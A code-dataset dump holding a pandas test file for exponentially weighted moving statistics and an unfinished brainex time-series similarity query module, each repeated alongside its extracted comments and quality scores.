Series([1.0])
)
tm.assert_series_equal(result, Series([np.NaN]))
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_different_input_array_raise_exception(name):
A = Series(np.random.randn(50), index=np.arange(50))
A[:10] = np.NaN
msg = "other must be a DataFrame or Series"
# exception raised is Exception
with pytest.raises(ValueError, match=msg):
getattr(A.ewm(com=20, min_periods=5), name)(np.random.randn(50))
def create_mock_weights(obj, com, adjust, ignore_na):
if isinstance(obj, DataFrame):
if not len(obj.columns):
return DataFrame(index=obj.index, columns=obj.columns)
w = concat(
[
create_mock_series_weights(
obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
)
for i, _ in enumerate(obj.columns)
],
axis=1,
)
w.index = obj.index
w.columns = obj.columns
return w
else:
return create_mock_series_weights(obj, com, adjust, ignore_na)
def create_mock_series_weights(s, com, adjust, ignore_na):
w = Series(np.nan, index=s.index)
alpha = 1.0 / (1.0 + com)
if adjust:
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
w.iat[i] = pow(1.0 / (1.0 - alpha), count)
count += 1
elif not ignore_na:
count += 1
else:
sum_wts = 0.0
prev_i = -1
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
if prev_i == -1:
w.iat[i] = 1.0
else:
w.iat[i] = alpha * sum_wts / pow(1.0 - alpha, count - prev_i)
sum_wts += w.iat[i]
prev_i = count
count += 1
elif not ignore_na:
count += 1
return w
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_mean(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
result = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
expected = (
x.multiply(weights).cumsum().divide(weights.cumsum()).fillna(method="ffill")
)
expected[
x.expanding().count() < (max(min_periods, 1) if min_periods else 1)
] = np.nan
tm.assert_equal(result, expected.astype("float64"))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_consistent(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding().count()
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x)
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
tm.assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
tm.assert_equal(corr_x_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_var_debiasing_factors(
consistency_data, adjust, ignore_na, min_periods
):
x, is_constant, no_nans = consistency_data
com = 3.0
# check variance debiasing factors
var_unbiased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=False)
var_biased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=True)
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
cum_sum = weights.cumsum().fillna(method="ffill")
cum_sum_sq = (weights * weights).cumsum().fillna(method="ffill")
numerator = cum_sum * cum_sum
denominator = numerator - cum_sum_sq
denominator[denominator <= 0.0] = np.nan
var_debiasing_factors_x = numerator / denominator
tm.assert_equal(var_unbiased_x, var_biased_x * var_debiasing_factors_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
if bias:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = (
(x * x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.mean()
)
tm.assert_equal(var_x, mean_x2 - (mean_x * mean_x))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var_constant(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding(min_periods=min_periods).count()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
# check that variance of constant series is identically 0
assert not (var_x > 0).any().any()
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = 0.0
if not bias:
expected[count_x < 2] = np.nan
tm.assert_equal(var_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_std(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
assert not (var_x < 0).any().any()
assert not (std_x < 0).any().any()
# check that var(x) == std(x)^2
tm.assert_equal(var_x, std_x * std_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_cov(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
cov_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
assert not (cov_x_x < 0).any().any()
# check that var(x) == cov(x, x)
tm.assert_equal(var_x, cov_x_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_series_cov_corr(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if isinstance(x, Series):
var_x_plus_y = (
(x + x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.var(bias=bias)
)
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
var_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
cov_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
# check that cov(x, y) == (var(x+y) - var(x) -
# var(y)) / 2
tm.assert_equal(cov_x_y, 0.5 * (var_x_plus_y - var_x - var_y))
# check that corr(x, y) == cov(x, y) / (std(x) *
# std(y))
corr_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x, bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
std_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
tm.assert_equal(corr_x_y, cov_x_y / (std_x * std_y))
if bias:
# check that biased cov(x, y) == mean(x*y) -
# mean(x)*mean(y)
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_x_times_y = (
(x * x)
.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
)
.mean()
)
tm.assert_equal(cov_x_y, mean_x_times_y - (mean_x * mean_y))
| import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
@pytest.mark.parametrize("func", ["cov", "corr"])
def test_ewm_pairwise_cov_corr(func, frame):
result = getattr(frame.ewm(span=10, min_periods=5), func)()
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = getattr(frame[1].ewm(span=10, min_periods=5), func)(frame[5])
tm.assert_series_equal(result, expected, check_names=False)
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov(name):
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=5), name)(B)
assert np.isnan(result.values[:14]).all()
assert not np.isnan(result.values[14:]).any()
@pytest.mark.parametrize("min_periods", [0, 1, 2])
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov_min_periods(name, min_periods):
# GH 7898
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=min_periods), name)(B)
# binary functions (ewmcov, ewmcorr) with bias=False require at
# least two values
assert np.isnan(result.values[:11]).all()
assert not np.isnan(result.values[11:]).any()
# check series of length 0
empty = Series([], dtype=np.float64)
result = getattr(empty.ewm(com=50, min_periods=min_periods), name)(empty)
tm.assert_series_equal(result, empty)
# check series of length 1
result = getattr(Series([1.0]).ewm(com=50, min_periods=min_periods), name)(
Series([1.0])
)
tm.assert_series_equal(result, Series([np.NaN]))
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_different_input_array_raise_exception(name):
A = Series(np.random.randn(50), index=np.arange(50))
A[:10] = np.NaN
msg = "other must be a DataFrame or Series"
# exception raised is Exception
with pytest.raises(ValueError, match=msg):
getattr(A.ewm(com=20, min_periods=5), name)(np.random.randn(50))
def create_mock_weights(obj, com, adjust, ignore_na):
if isinstance(obj, DataFrame):
if not len(obj.columns):
return DataFrame(index=obj.index, columns=obj.columns)
w = concat(
[
create_mock_series_weights(
obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
)
for i, _ in enumerate(obj.columns)
],
axis=1,
)
w.index = obj.index
w.columns = obj.columns
return w
else:
return create_mock_series_weights(obj, com, adjust, ignore_na)
def create_mock_series_weights(s, com, adjust, ignore_na):
w = Series(np.nan, index=s.index)
alpha = 1.0 / (1.0 + com)
if adjust:
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
w.iat[i] = pow(1.0 / (1.0 - alpha), count)
count += 1
elif not ignore_na:
count += 1
else:
sum_wts = 0.0
prev_i = -1
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
if prev_i == -1:
w.iat[i] = 1.0
else:
w.iat[i] = alpha * sum_wts / pow(1.0 - alpha, count - prev_i)
sum_wts += w.iat[i]
prev_i = count
count += 1
elif not ignore_na:
count += 1
return w
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_mean(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
result = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
expected = (
x.multiply(weights).cumsum().divide(weights.cumsum()).fillna(method="ffill")
)
expected[
x.expanding().count() < (max(min_periods, 1) if min_periods else 1)
] = np.nan
tm.assert_equal(result, expected.astype("float64"))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_consistent(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding().count()
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x)
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
tm.assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
tm.assert_equal(corr_x_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_var_debiasing_factors(
consistency_data, adjust, ignore_na, min_periods
):
x, is_constant, no_nans = consistency_data
com = 3.0
# check variance debiasing factors
var_unbiased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=False)
var_biased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=True)
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
cum_sum = weights.cumsum().fillna(method="ffill")
cum_sum_sq = (weights * weights).cumsum().fillna(method="ffill")
numerator = cum_sum * cum_sum
denominator = numerator - cum_sum_sq
denominator[denominator <= 0.0] = np.nan
var_debiasing_factors_x = numerator / denominator
tm.assert_equal(var_unbiased_x, var_biased_x * var_debiasing_factors_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
if bias:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = (
(x * x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.mean()
)
tm.assert_equal(var_x, mean_x2 - (mean_x * mean_x))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var_constant(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding(min_periods=min_periods).count()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
# check that variance of constant series is identically 0
assert not (var_x > 0).any().any()
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = 0.0
if not bias:
expected[count_x < 2] = np.nan
tm.assert_equal(var_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_std(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
assert not (var_x < 0).any().any()
assert not (std_x < 0).any().any()
# check that var(x) == std(x)^2
tm.assert_equal(var_x, std_x * std_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_cov(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
cov_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
assert not (cov_x_x < 0).any().any()
# check that var(x) == cov(x, x)
tm.assert_equal(var_x, cov_x_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_series_cov_corr(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if isinstance(x, Series):
var_x_plus_y = (
(x + x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.var(bias=bias)
)
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
var_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
cov_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
# check that cov(x, y) == (var(x+y) - var(x) -
# var(y)) / 2
tm.assert_equal(cov_x_y, 0.5 * (var_x_plus_y - var_x - var_y))
# check that corr(x, y) == cov(x, y) / (std(x) *
# std(y))
corr_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x, bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
std_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
tm.assert_equal(corr_x_y, cov_x_y / (std_x * std_y))
if bias:
# check that biased cov(x, y) == mean(x*y) -
# mean(x)*mean(y)
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_x_times_y = (
(x * x)
.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
)
.mean()
)
tm.assert_equal(cov_x_y, mean_x_times_y - (mean_x * mean_y))
| en | 0.855206 | # GH 7898 # binary functions (ewmcov, ewmcorr) with bias=False require at # least two values # check series of length 0 # check series of length 1 # exception raised is Exception # check that correlation of a series with itself is either 1 or NaN # check mean of constant series # check correlation of constant series with itself is NaN # check variance debiasing factors # check that biased var(x) == mean(x^2) - mean(x)^2 # check that variance of constant series is identically 0 # check that var(x) == std(x)^2 # check that var(x) == cov(x, x) # check that cov(x, y) == (var(x+y) - var(x) - # var(y)) / 2 # check that corr(x, y) == cov(x, y) / (std(x) * # std(y)) # check that biased cov(x, y) == mean(x*y) - # mean(x)*mean(y) | 2.343834 | 2 |
brainex/query.py | ebuntel/BrainExTemp | 1 | 10346 |
# TODO finish implementing query
import math
from pyspark import SparkContext
# from genex.cluster import sim_between_seq
from brainex.op.query_op import sim_between_seq
from brainex.parse import strip_function, remove_trailing_zeros
from .classes import Sequence
from brainex.database import genexengine
def query(q: Sequence, gc: genexengine, loi: list, sc: SparkContext,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, mode:str='genex'):
"""
:param q: query sequence
:param gc: Gcluster in which to query
:param loi: list of two integer values, specifying the query range, if set to None, is going to query all length
:param sc: spark context on which to run the query operation
:param k: integer, specifying to return top k matches
:param ex_sameID: boolean, whether to include sequences from the time series with the same id as the query sequence
:param overlap: float, how much overlapping between queries lookups
:param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force)
"""
if mode == 'genex':
gquery()
elif mode == 'bf':
bfquery()
else:
raise Exception('Unsupported query mode: ' + mode)
def get_query_from_dict():
pass
def get_query_sequence_from_file(file: str):
resList = []
with open(file, 'r') as f:
for i, line in enumerate(f):
if not i:
features = list(map(lambda x: strip_function(x),
line.strip()[:-1].split(',')))
if line != "" and line != "\n":
data = remove_trailing_zeros(line.split(",")[:-1])
series_data = data[len(features):]
resList.append(series_data)
if len(resList[0]) == 0:
return resList[1:]
else:
return resList
def gquery(query_list: list, gc_data: dict, loi: list, input_list: list,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, ):
"""
Because Gcluster object doesn't have map property, we have to use dict as input
:param file:
:param gc_data:
:param loi:
:param input_list:
:param k:
:param ex_sameID:
:param overlap:
:return:
"""
# get query from id, start, end point
# get query from csv file
#
# query_list = []
# query_set = get_query_from_csv_with_id(file)
# print(query_set)
# for cur_query in query_set:
# query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list))
# print(query_list)
return custom_query(query_list, loi, gc_data, k, input_list)
def bfquery():
print()
#
# def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext,
# k:int=1, ex_sameID: bool=False, overlap: float= 1.0):
#
# query_result = filter_rdd_back.repartition(16).map(
# lambda clusters: custom_query(q, loi, gc, k,
# global_time_series_dict.value, ))
# # changed here
# # plot_query_result(query_sequence, query_result, global_time_series_dict.value)
# return query_result
def get_query_from_sequence(id: tuple, start: int, end: int, input_list: list):
"""
:param id:
:param start:
:param end:
:param input_list:
:return: a list
"""
try:
input_dict = dict(input_list) # validate by converting input_list into a dict
except (TypeError, ValueError):
raise Exception('sequence: fetch_data: input_list is not key-value pair.')
return input_dict[id][start: end]
def custom_query(query_sequences: list, loi: list, Gcluster_data:dict, k : int, input_list:list):
# """
#
# :param query_sequences: list of list: the list of sequences to be queried
# :param cluster: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj
# the sequences in the cluster are all of the SAME length
# :param k: int
# :return list of time series objects: best k matches. Again note they are all of the SAME length
# """
"""
:param query_sequences:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
# get query from csv file which contains lists of list of query actual clusters
# get query from csv file which contains lists of tuple of id, start, endpoint
query_result = dict()
if not isinstance(query_sequences, list) or len(query_sequences) == 0:
raise ValueError("query sequence must be a list and not empty")
cur_query_number = 0
if isinstance(query_sequences[0], list):
print("length of query is [" + str(len(query_sequences)) + "]" + "[" + str(len(query_sequences[0])) + "]")
print("query is a list of list")
for cur_query in query_sequences:
if isinstance(cur_query, list):
query_result[cur_query_number] = get_most_k_sim(cur_query, loi, Gcluster_data, k, input_list)
cur_query_number += 1
return query_result
else:
return get_most_k_sim(query_sequences, loi, Gcluster_data, k, input_list)
def get_most_k_sim(query_sequence: list, loi: list, Gcluster_data : dict, k, input_list:list):
"""
:param query_sequence:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
min_rprs = None # the representative that is closest to the query distance
min_dist = math.inf
target_cluster = []
print("length of gcluster clusters is " + str(len(Gcluster_data[1])))
for cur_rprs_seq in Gcluster_data[1].keys():
# TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing)
if (cur_rprs_seq.end - cur_rprs_seq.start + 1) in range(loi[0], loi[1] + 1):
# modify here, not use get clusters from objects, use values
cur_dist = sim_between_seq(query_sequence, cur_rprs_seq.fetch_data(input_list))
if cur_dist < min_dist:
min_rprs = cur_rprs_seq
min_dist = cur_dist
else:
break
if min_rprs:
print('min representative is ' + min_rprs.__str__())
print('min dist' + str(min_dist))
# print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict))))
target_cluster = Gcluster_data[1].get(min_rprs)
print('len of cluster is ' + str(len(target_cluster)))
# print("sorting")
#
target_cluster.sort(key=lambda cluster_sequence: sim_between_seq(query_sequence,
cluster_sequence.data))
k = int(k)
return target_cluster[0:k] # return the k most similar sequences
else:
return None
|
# TODO finish implementing query
import math
from pyspark import SparkContext
# from genex.cluster import sim_between_seq
from brainex.op.query_op import sim_between_seq
from brainex.parse import strip_function, remove_trailing_zeros
from .classes import Sequence
from brainex.database import genexengine
def query(q: Sequence, gc: genexengine, loi: list, sc: SparkContext,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, mode:str='genex'):
"""
:param q: query sequence
:param gc: Gcluster in which to query
:param loi: list of two integer values, specifying the query range, if set to None, is going to query all length
:param sc: spark context on which to run the query operation
:param k: integer, specifying to return top k matches
:param ex_sameID: boolean, whether to include sequences from the time series with the same id as the query sequence
:param overlap: float, how much overlapping between queries lookups
:param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force)
"""
if mode == 'genex':
gquery()
elif mode == 'bf':
bfquery()
else:
raise Exception('Unsupported query mode: ' + mode)
def get_query_from_dict():
pass
def get_query_sequence_from_file(file: str):
resList = []
with open(file, 'r') as f:
for i, line in enumerate(f):
if not i:
features = list(map(lambda x: strip_function(x),
line.strip()[:-1].split(',')))
if line != "" and line != "\n":
data = remove_trailing_zeros(line.split(",")[:-1])
series_data = data[len(features):]
resList.append(series_data)
if len(resList[0]) == 0:
return resList[1:]
else:
return resList
def gquery(query_list: list, gc_data: dict, loi: list, input_list: list,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, ):
"""
Because Gcluster object doesn't have map property, we have to use dict as input
:param file:
:param gc_data:
:param loi:
:param input_list:
:param k:
:param ex_sameID:
:param overlap:
:return:
"""
# get query from id, start, end point
# get query from csv file
#
# query_list = []
# query_set = get_query_from_csv_with_id(file)
# print(query_set)
# for cur_query in query_set:
# query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list))
# print(query_list)
return custom_query(query_list, loi, gc_data, k, input_list)
def bfquery():
print()
#
# def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext,
# k:int=1, ex_sameID: bool=False, overlap: float= 1.0):
#
# query_result = filter_rdd_back.repartition(16).map(
# lambda clusters: custom_query(q, loi, gc, k,
# global_time_series_dict.value, ))
# # changed here
# # plot_query_result(query_sequence, query_result, global_time_series_dict.value)
# return query_result
def get_query_from_sequence(id: tuple, start: int, end: int, input_list: list):
"""
:param id:
:param start:
:param end:
:param input_list:
:return: a list
"""
try:
input_dict = dict(input_list) # validate by converting input_list into a dict
except (TypeError, ValueError):
raise Exception('sequence: fetch_data: input_list is not key-value pair.')
return input_dict[id][start: end]
def custom_query(query_sequences: list, loi: list, Gcluster_data:dict, k : int, input_list:list):
# """
#
# :param query_sequences: list of list: the list of sequences to be queried
# :param cluster: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj
# the sequences in the cluster are all of the SAME length
# :param k: int
# :return list of time series objects: best k matches. Again note they are all of the SAME length
# """
"""
:param query_sequences:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
# get query from csv file which contains lists of list of query actual clusters
# get query from csv file which contains lists of tuple of id, start, endpoint
query_result = dict()
if not isinstance(query_sequences, list) or len(query_sequences) == 0:
raise ValueError("query sequence must be a list and not empty")
cur_query_number = 0
if isinstance(query_sequences[0], list):
print("length of query is [" + str(len(query_sequences)) + "]" + "[" + str(len(query_sequences[0])) + "]")
print("query is a list of list")
for cur_query in query_sequences:
if isinstance(cur_query, list):
query_result[cur_query_number] = get_most_k_sim(cur_query, loi, Gcluster_data, k, input_list)
cur_query_number += 1
return query_result
else:
return get_most_k_sim(query_sequences, loi, Gcluster_data, k, input_list)
def get_most_k_sim(query_sequence: list, loi: list, Gcluster_data : dict, k, input_list:list):
"""
:param query_sequence:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
min_rprs = None # the representative that is closest to the query distance
min_dist = math.inf
target_cluster = []
print("length of gcluster clusters is " + str(len(Gcluster_data[1])))
for cur_rprs_seq in Gcluster_data[1].keys():
# TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing)
if (cur_rprs_seq.end - cur_rprs_seq.start + 1) in range(loi[0], loi[1] + 1):
# modify here, not use get clusters from objects, use values
cur_dist = sim_between_seq(query_sequence, cur_rprs_seq.fetch_data(input_list))
if cur_dist < min_dist:
min_rprs = cur_rprs_seq
min_dist = cur_dist
else:
break
if min_rprs:
print('min representative is ' + min_rprs.__str__())
print('min dist' + str(min_dist))
# print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict))))
target_cluster = Gcluster_data[1].get(min_rprs)
print('len of cluster is ' + str(len(target_cluster)))
# print("sorting")
#
target_cluster.sort(key=lambda cluster_sequence: sim_between_seq(query_sequence,
cluster_sequence.data))
k = int(k)
return target_cluster[0:k] # return the k most similar sequences
else:
return None
| en | 0.675752 | # TODO finish implementing query # from genex.cluster import sim_between_seq :param q: query sequence :param gc: Gcluster in which to query :param loi: list of two integer values, specifying the query range, if set to None, is going to query all length :param sc: spark context on which to run the query operation :param k: integer, specifying to return top k matches :param ex_sameID: boolean, whether to include sequences from the time series with the same id as the query sequence :param overlap: float, how much overlapping between queries lookups :param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force) Because Gcluster object doesn't have map property, we have to use dict as input :param file: :param gc_data: :param loi: :param input_list: :param k: :param ex_sameID: :param overlap: :return: # get query from id, start, end point # get query from csv file # # query_list = [] # query_set = get_query_from_csv_with_id(file) # print(query_set) # for cur_query in query_set: # query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list)) # print(query_list) # # def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext, # k:int=1, ex_sameID: bool=False, overlap: float= 1.0): # # query_result = filter_rdd_back.repartition(16).map( # lambda clusters: custom_query(q, loi, gc, k, # global_time_series_dict.value, )) # # changed here # # plot_query_result(query_sequence, query_result, global_time_series_dict.value) # return query_result :param id: :param start: :param end: :param input_list: :return: a list # validate by converting input_list into a dict # """ # # :param query_sequences: list of list: the list of sequences to be queried # :param cluster: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj # the sequences in the cluster are all of the SAME length # :param k: int # :return list of time series objects: best k matches. Again note they are all of the SAME length # """ :param query_sequences: :param query_range: :param Gcluster_data: :param k: :param input_list: :return: # get query from csv file which contains lists of list of query actual clusters # get query from csv file which contains lists of tuple of id, start, endpoint :param query_sequence: :param query_range: :param Gcluster_data: :param k: :param input_list: :return: # the representative that is closest to the query distance # TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing) # modify here, not use get clusters from objects, use values # print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict)))) # print("sorting") # # return the k most similar sequences | 2.598485 | 3 |
